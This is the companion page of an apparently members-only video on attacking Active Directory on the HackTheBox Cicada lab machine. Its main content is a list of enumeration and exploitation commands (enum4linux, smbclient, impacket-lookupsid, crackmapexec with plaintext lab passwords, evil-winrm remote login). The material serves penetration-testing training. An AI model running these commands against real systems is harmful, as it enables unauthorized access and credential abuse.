17:59 · May 2026 ★ Members only
Active Directory Enumeration
Let's hack Active Directory by using the HackTheBox Cicada server. We will focus on enumerating and exploiting the Active Directory and not completing the Capture The Flag challenge.
This is a members-only video.
Join the YouTube channel membership to watch this and other member-exclusive content. The companion notes below are free for everyone.
Commands used
enum4linux -A 10.10.11.35
enum4linux -A 10.10.11.35 -u guest
smbmap -u guest -H 10.10.11.35
smbclient -L 10.10.11.35 –no-pass
smbclient //10.10.11.35/HR #anonymous login
impacket-lookupsid ‘cicada.htb/guest’@10.10.11.35 -no-pass
crackmapexec smb cicada.htb -u michael.wrightson -p ‘Cicada$M6Corpb*@Lp#nZp!8’ –users
crackmapexec smb cicada.htb -u michael.wrightson -p ‘Cicada$M6Corpb*@Lp#nZp!8’ –shares
crackmapexec smb cicada.htb -u david.orelious -p ‘aRt$Lp#7t*VQ!3’ –shares
smbclient //10.10.11.35/DEV -U david.orelious
evil-winrm -i 10.10.11.35 -u emily.oscars
